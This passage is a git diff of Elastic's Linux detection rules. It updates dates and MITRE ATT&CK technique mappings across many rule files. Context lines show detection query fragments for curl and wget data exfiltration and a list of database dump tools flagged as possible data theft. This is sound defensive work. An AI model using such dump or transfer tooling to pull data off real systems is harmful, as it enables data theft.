+[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/execution_tc_bpf_filter.toml b/rules/linux/execution_tc_bpf_filter.toml index 52cc47e2b35..f71d3a5316e 100644 --- a/rules/linux/execution_tc_bpf_filter.toml +++ b/rules/linux/execution_tc_bpf_filter.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/11" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -129,3 +129,21 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml b/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml index 6c81fd12cc5..4db0ac23cdf 100644 --- a/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml +++ b/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/13" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -109,11 +109,28 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1620" +name = "Reflective Code Loading" +reference = "https://attack.mitre.org/techniques/T1620/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["process.name"] diff --git a/rules/linux/execution_unusual_kthreadd_execution.toml b/rules/linux/execution_unusual_kthreadd_execution.toml index fb453b1a848..cfcd4c91f4b 100644 --- a/rules/linux/execution_unusual_kthreadd_execution.toml +++ b/rules/linux/execution_unusual_kthreadd_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/10/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,21 +117,43 @@ process.command_line:( [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.009" +name = "Break Process Trees" +reference = "https://attack.mitre.org/techniques/T1036/009/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["process.name", "host.id"] diff --git a/rules/linux/execution_unusual_path_invocation_from_command_line.toml b/rules/linux/execution_unusual_path_invocation_from_command_line.toml index 7c4599b99b1..254cf9a3902 100644 --- a/rules/linux/execution_unusual_path_invocation_from_command_line.toml +++ b/rules/linux/execution_unusual_path_invocation_from_command_line.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -135,11 +135,20 @@ id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name"] diff --git a/rules/linux/execution_unusual_pkexec_execution.toml b/rules/linux/execution_unusual_pkexec_execution.toml index 0b613bb5b67..fb8c1cd5886 100644 --- a/rules/linux/execution_unusual_pkexec_execution.toml +++ b/rules/linux/execution_unusual_pkexec_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -129,6 +129,11 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -147,6 +152,23 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.command_line"] diff --git a/rules/linux/exfiltration_potential_curl_data_exfiltration.toml b/rules/linux/exfiltration_potential_curl_data_exfiltration.toml index d26ede83d7b..af05ed7556d 100644 --- a/rules/linux/exfiltration_potential_curl_data_exfiltration.toml +++ b/rules/linux/exfiltration_potential_curl_data_exfiltration.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/13" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -113,12 +113,22 @@ process.name == "curl" and ?process.parent.executable != null and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" - - [[rule.threat.technique]] - name = "Exfiltration Over Alternative Protocol" - id = "T1048" - reference = "https://attack.mitre.org/techniques/T1048/" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + +[[rule.threat.technique.subtechnique]] +id = "T1048.001" +name = "Exfiltration Over Symmetric Encrypted Non-C2 Protocol" +reference = "https://attack.mitre.org/techniques/T1048/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1048.003" +name = "Exfiltration Over Unencrypted Non-C2 Protocol" +reference = "https://attack.mitre.org/techniques/T1048/003/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml b/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml index 89aa348f4dd..091686f3033 100644 --- a/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml +++ b/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,6 +124,11 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1030" +name = "Data Transfer Size Limits" +reference = "https://attack.mitre.org/techniques/T1030/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/linux/exfiltration_potential_database_dumping.toml b/rules/linux/exfiltration_potential_database_dumping.toml index 6f00692824d..579db8edbdb 100644 --- a/rules/linux/exfiltration_potential_database_dumping.toml +++ b/rules/linux/exfiltration_potential_database_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/13" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,12 +104,30 @@ process.name in ("pg_dump", "pg_dumpall", "mysqldump", "mariadb-dump", "mongodum [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" - [[rule.threat.technique]] - name = "Exfiltration Over Alternative Protocol" - id = "T1048" - reference = "https://attack.mitre.org/techniques/T1048/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1119" +name = "Automated Collection" +reference = "https://attack.mitre.org/techniques/T1119/" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/linux/exfiltration_potential_wget_data_exfiltration.toml b/rules/linux/exfiltration_potential_wget_data_exfiltration.toml index e0f16b19169..30d03cd7881 100644 --- a/rules/linux/exfiltration_potential_wget_data_exfiltration.toml +++ b/rules/linux/exfiltration_potential_wget_data_exfiltration.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/07" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/13" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,12 +122,25 @@ process.name == "wget" and ?process.parent.executable != null and ( [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Exfiltration" - id = "TA0010" - reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" - [[rule.threat.technique]] - name = "Exfiltration Over Alternative Protocol" - id = "T1048" - reference = "https://attack.mitre.org/techniques/T1048/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml b/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml index f6d821c4711..51dce3af626 100644 --- a/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml +++ b/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -171,6 +171,11 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" @@ -179,6 +184,16 @@ reference = "https://attack.mitre.org/tactics/TA0010/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/impact_data_encrypted_via_openssl.toml b/rules/linux/impact_data_encrypted_via_openssl.toml index d5ae1fbcb95..f7bf7c915b7 100644 --- a/rules/linux/impact_data_encrypted_via_openssl.toml +++ b/rules/linux/impact_data_encrypted_via_openssl.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -115,3 +115,16 @@ reference = "https://attack.mitre.org/techniques/T1486/" id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/impact_memory_swap_modification.toml b/rules/linux/impact_memory_swap_modification.toml index 2336a398314..c1231cd493c 100644 --- a/rules/linux/impact_memory_swap_modification.toml +++ b/rules/linux/impact_memory_swap_modification.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -121,6 +121,11 @@ id = "T1496" name = "Resource Hijacking" reference = "https://attack.mitre.org/techniques/T1496/" +[[rule.threat.technique.subtechnique]] +id = "T1496.001" +name = "Compute Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/001/" + [rule.threat.tactic] id = "TA0040" name = "Impact" diff --git a/rules/linux/impact_potential_bruteforce_malware_infection.toml b/rules/linux/impact_potential_bruteforce_malware_infection.toml index 93c5361d32a..5ce3b6d80a5 100644 --- a/rules/linux/impact_potential_bruteforce_malware_infection.toml +++ b/rules/linux/impact_potential_bruteforce_malware_infection.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -205,3 +205,16 @@ reference = "https://attack.mitre.org/techniques/T1071/" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/impact_process_kill_threshold.toml b/rules/linux/impact_process_kill_threshold.toml index 85ce3461abd..a1f4454d1ea 100644 --- a/rules/linux/impact_process_kill_threshold.toml +++ b/rules/linux/impact_process_kill_threshold.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/27" integration = ["endpoint", "auditd_manager", "crowdstrike"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,6 +107,23 @@ id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.threshold] field = ["host.id", "process.executable", "user.name"] value = 15 diff --git a/rules/linux/initial_access_apache_struts_cve_2023_50164_exploitation_to_webshell.toml b/rules/linux/initial_access_apache_struts_cve_2023_50164_exploitation_to_webshell.toml index 45f5c1a911f..89e8ba1f7b8 100644 --- a/rules/linux/initial_access_apache_struts_cve_2023_50164_exploitation_to_webshell.toml +++ b/rules/linux/initial_access_apache_struts_cve_2023_50164_exploitation_to_webshell.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -114,31 +114,44 @@ sequence by agent.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" + [[rule.threat.technique.subtechnique]] id = "T1505.003" name = "Web Shell" reference = "https://attack.mitre.org/techniques/T1505/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/initial_access_first_time_public_key_authentication.toml b/rules/linux/initial_access_first_time_public_key_authentication.toml index 1e74cf2cb47..4e1a8689f7f 100644 --- a/rules/linux/initial_access_first_time_public_key_authentication.toml +++ b/rules/linux/initial_access_first_time_public_key_authentication.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,16 +99,38 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["system.auth.ssh.signature"] diff --git a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml index d1e0215d442..f571a929dd7 100644 --- a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml +++ b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,16 +92,33 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["related.ip"] diff --git a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml index ffc5417fe60..098cdd42503 100644 --- a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml +++ b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,16 +76,38 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["related.user"] diff --git a/rules/linux/initial_access_telnet_auth_bypass_envar_auditd.toml b/rules/linux/initial_access_telnet_auth_bypass_envar_auditd.toml index 3ebcdec8cc2..6d17eb3c5b4 100644 --- a/rules/linux/initial_access_telnet_auth_bypass_envar_auditd.toml +++ b/rules/linux/initial_access_telnet_auth_bypass_envar_auditd.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/26" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -93,26 +93,39 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml b/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml index 159ac1545b7..b0118148c35 100644 --- a/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml +++ b/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/24" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,26 +101,39 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/lateral_movement_kubeconfig_file_activity.toml b/rules/linux/lateral_movement_kubeconfig_file_activity.toml index 742506ac792..14e0cd4c88e 100644 --- a/rules/linux/lateral_movement_kubeconfig_file_activity.toml +++ b/rules/linux/lateral_movement_kubeconfig_file_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -151,12 +151,30 @@ reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/lateral_movement_remote_file_creation_world_writeable_dir.toml b/rules/linux/lateral_movement_remote_file_creation_world_writeable_dir.toml index c4ec5a4e372..2cf39df00da 100644 --- a/rules/linux/lateral_movement_remote_file_creation_world_writeable_dir.toml +++ b/rules/linux/lateral_movement_remote_file_creation_world_writeable_dir.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -132,6 +132,18 @@ id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable", "host.id"] diff --git a/rules/linux/lateral_movement_ssh_it_worm_download.toml b/rules/linux/lateral_movement_ssh_it_worm_download.toml index d7738588cf4..f2ca0a1065a 100644 --- a/rules/linux/lateral_movement_ssh_it_worm_download.toml +++ b/rules/linux/lateral_movement_ssh_it_worm_download.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/21" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -135,3 +135,16 @@ reference = "https://attack.mitre.org/techniques/T1563/001/" id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/lateral_movement_telnet_network_activity_external.toml b/rules/linux/lateral_movement_telnet_network_activity_external.toml index 40cf153f80e..691a01df08b 100644 --- a/rules/linux/lateral_movement_telnet_network_activity_external.toml +++ b/rules/linux/lateral_movement_telnet_network_activity_external.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint", 